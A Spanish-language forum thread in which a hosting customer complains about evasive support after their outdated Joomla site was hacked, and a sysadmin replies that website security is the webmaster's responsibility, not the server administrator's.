Si a un cliente le hackean una web por tener un software desactualizado, yo creo que como cliente tengo derecho a que me expliquéis que ha pasado y me ayudéis a solucionarlo no? Es lo que entiendo yo por atención al cliente y sino como os digo HABLAD CLARO y ponedlo bien grande en las especificaciones de que incluye y no incluye un servidor administrado porque os aseguro de que haberlo dicho así de claro jamás os habría contratado.

P.D: Cada vez que tengo un problema grave, que por suerte suele ser 1 vez cada 2 años ocurre lo mismo. Me conesta el tal Wilson con evasivas, me quejo un monton y me indigno y entonces el "señorito" si me ayuda a solucionar mi problema.

Es que es vergonzoso, ni responde mis preguntas ni me dice como solucionar mi problema, algo que a él le lleva 2 minutos, tanto le costaba decirme de un principio: "Es por qué tienes Joomla desactualizado". Es que me ha respondido con evasivas totalmente.
 

skamasle

Mi
SysManager
Verificación en dos pasos desactivada
Desde
16 Oct 2010
Mensajes
3.095
Crédito(s)
1
Puntos
573
Yo digo lo que todos, si pagas a alguien para que administre tu servidor, administrará el servidor.

Pero al menos yo digo a mis clientes, le pondré seguridad pero si tu tienes el script desactualizado, o subes un theme con una shell o subes un plugin infectado toda la seguridad que yo le ponga se puede ir al retrete, ayudará un poco así pero es más a nivel servidor, de las webs se encarga el webmaster y no el sysadmin, el webmaster le dice al administrador de servidores añademe un modulo, añade esto, instala aquello, el sysadmin como mucho informa lo que pasa en el log de errores.

Así que si hackean la web es culpa del webmaster, si esta desactualizada también, si las claves de la web son user:admin clave 12345, es culpa del webmaster.

En fin, webmaster es el culpable de lo que pase en la web, y si es un joomla desactualiazdo peor aún... si actualizado tiene bugs, una versión vieja ni te digo, creo que es el cms con mas agujeros de seguridad del mundo :/
 
Estado
Cerrado para nuevas respuestas

Arriba